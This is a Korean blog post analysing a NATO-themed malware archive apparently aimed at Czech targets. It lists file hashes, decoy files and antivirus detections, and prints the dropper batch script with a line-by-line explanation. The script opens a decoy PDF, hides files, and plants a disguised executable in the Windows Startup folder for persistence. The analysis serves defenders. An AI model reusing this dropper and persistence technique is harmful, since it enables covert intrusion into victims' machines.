나토(NATO-OTAN) 사칭 악성코드-CZ_army_NATO_coeration.zip(2024.8.5)

오늘은 북대서양 조약 기구인 나토(NATO) 사칭 악성코드인 CZ_army_NATO_coeration.zip(2024.8.5)에 대해 글을 적어 보겠습니다. 해당 악성코드는 나토(NATO-OTAN) 즉 북대서양 조약 기구(北大西洋條約機構)는 냉전이 시작된 1949년 집단안전보장조약인 북대서양 조약에 의해 탄생한 북미와 유럽 등 서방 국가들의 군사동맹이며 본부는 벨기에의 수도 브뤼셀에 있으며 당연히 냉전 시대이니까? 바르샤바 조약기구이며 지금은 러시아이며 해당 악성코드에 포함된 파일들의 해쉬값들은 다음과 같습니다.
1.The importance of and outlook for the Czech Republic in NATO.pdf.lnk
436994d4a5c8d54acb2b521d0847d77e6af6c2c0e40468248b1dd019c6dafa84
AdobeAcrobatReader(.)bat
ace33243994a9da0797601bdd4191e25967a1da2644f0d0b530e26c71854d5d9
CZ_army_NATO_cooperation(.)zip 
9549d3d2b8e8b4e8f163a8b9fa3b02b8a28d78e4b583baccb6210ef267559c6e
NATO_Countries_Drishti_IAS_English(.)jpg 
3cf3885f1fc29da9b5fa0d6e2ee6c52ee0de7c37c295c7403fdf55566f4019ad 
NatoDoc(.)pdf
a05d053174b52a9b158a5ec841c1a7633b9368c4ac2da371a11a9364f8a8dc60
New_CZ_army_Unit(.)jfif
ffca5448c2bc875bdb269cb38aa91f5386dcf2f55a62d5bb0919bdf7babeac69
Postup_zmeny_hesla_z_IMO(.)pdf  
8820e0c249305ffa3d38e72a7f27c0e2195bc739d08f5d270884be6237eea500
The importance of and outlook for the Czech Republic in NATO(.)pdf 
fda71a7de6d473826465bb83210107501e66a5d96e533772444b3b24806286fd
USA_cooperation(.)jfif
d7a06131cfbbc412440fbfe3e7fb46871a84a512c276d57969fd0becc2022bf3
입니다.

악성코드에 포함된 파일들

먼저 AdobeAcrobatReader(.)bat에 포함된 코드

@echo off
start "" "%~dp0\Postup_zmeny_hesla_z_IMO(.)pdf"
attrib -r -s -h "%~dp0\NatoDoc(.)pdf"
attrib -r -s -h "%~dp0\The importance of and outlook for the Czech Republic in NATO(.)pdf"
echo F|xcopy "%~dp0\NatoDoc.pdf" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\AdobeReader(.)exe" /Y /F
attrib +r +s +h "%~dp0\1.The importance of and outlook for the Czech Republic in NATO(.)pdf(.)lnk"
attrib +r +s +h "%~dp0\NatoDoc(.)pdf"

악성코드 에 포함된 디코이 PDF 파일

스크립트 세부 설명

1.@echo off: 명령어는 명령 프롬프터에서 실행되는 명령어들을 화면에 출력하지 않도록 설정 스크립트의 실행 결과만 보이게 하여 사용자가 명령어 자체를 보지 못하게 숨기는 역할
2. start %~dp0\Postup_zmeny_hesla_z_IMO(.)pdf
스크립트와 같은 디렉터리에 있는 Postup_zmeny_hesla_z_IMO(.)pdf 파일을 실행하고 %~dp0는 스크립트 파일이 위치한 디렉터리 경로를 나타내는 것이 특징
3.attrib -r -s -h "%~dp0\NatoDoc(.)pdf"
NatoDoc(.)pdf 파일의 읽기 전용, 시스템, 숨긴 속성을 제거
-r은 읽기 전용 속성을 제거 -s는 시스템 파일 속성을 제거-h는 숨김 속성을 제거
4. attrib -r -s -h "%~dp0\The importance of and outlook for the Czech Republic in NATO(.)pdf
The importance of and outlook for the Czech Republic in NATO(.)pdf 파일의 읽기 전용, 시스템, 숨김 속성을 제거
5.echo F|xcopy "%~dp0\NatoDoc(.)pdf" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\AdobeReader(.)exe" /Y /F
NatoDoc(.)pdf 파일을 윈도우 시작 프로그램 폴더에 AdobeReader(.)exe라는 이름으로 복사
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ 시스템 시작 시 자동으로 실행되는 프로그램을 위한 디렉터리
echo F|는 Xcopy 실행 시 나타날 수 있는 프롬프터에 대해 자동으로 F 를 입력하여 진행
/Y 옵션은 파일이 이미 존재할 때 사용자에게 묻지 않고 덮어쓰기를 진행
/F 옵션은 복사된 파일의 전체 경로와 이름을 보여줌
컴퓨터를 시작할 때마다 NatoDoc(.)pdf라는 이름의 파일을 AdobeReader(.)exe로 실행하게 합니다. 
6.attrib +r +s +h "%~dp0\1.The importance of and outlook for the Czech Republic in NATO.pdf(.)lnk
1.The importance of and outlook for the Czech Republic in NATO(.)pdf(.)lnk라는 링크 파일의 읽기 전용, 시스템, 숨김 속성을 설정
+r은 읽기 전용 속성을 추가 +s는 시스템 파일 속성을 추가 +h는 숨김 속성을 추가
7.attrib +r +s +h "%~dp0\NatoDoc(.)pdf
NatoDoc(.)pdf 파일의 읽기 전용, 시스템, 숨김 속성을 설정하여 보호

악성코드 에 포함된 디코이 PDF 파일

이며 다음과 같은 파일을 디코이로 사용합니다.
New_CZ_army_Unit(.)jfif
USA_cooperation(.)jfif
Postup_zmeny_hesla_z_IMO(.)pdf
공격 주체는 알 수가 없지만 일단 체코 쪽에서 올리기가 된 것으로 보아서 나토 국가 중 하나인 체코를 털려고 만든 것이 아닐까 생각을 합니다.
2024-08-04 23:42:30 기준 바이러스토탈에서 탐지하는 보안 업체들은 다음과 같습니다.
Avira (no cloud):HEUR/AGEN.1366633
Cynet:Malicious (score: 99)
DeepInstinct:MALICIOUS
Elastic:Malicious (high Confidence)
ESET-NOD32:A Variant Of Win64/Injector.NJ
Ikarus:Trojan-PSW.Agent
Kaspersky:HEUR:Trojan.Win64.Generic
Microsoft:Trojan:Win64/CobaltStrike.AH!MTB
SentinelOne (Static ML):Static AI - Malicious Archive
WithSecure:Heuristic.HEUR/AGEN.1366633
ZoneAlarm by Check Point:HEUR:Trojan.Win64.Generic
이며 어느 국가이든 군사 시설, 정부 시설, 군 주요 인사등 정부 인사들이든 민간인이든 항상 기본적인 보안 수칙을 지키면서 사용을 하는 것을 권장합니다.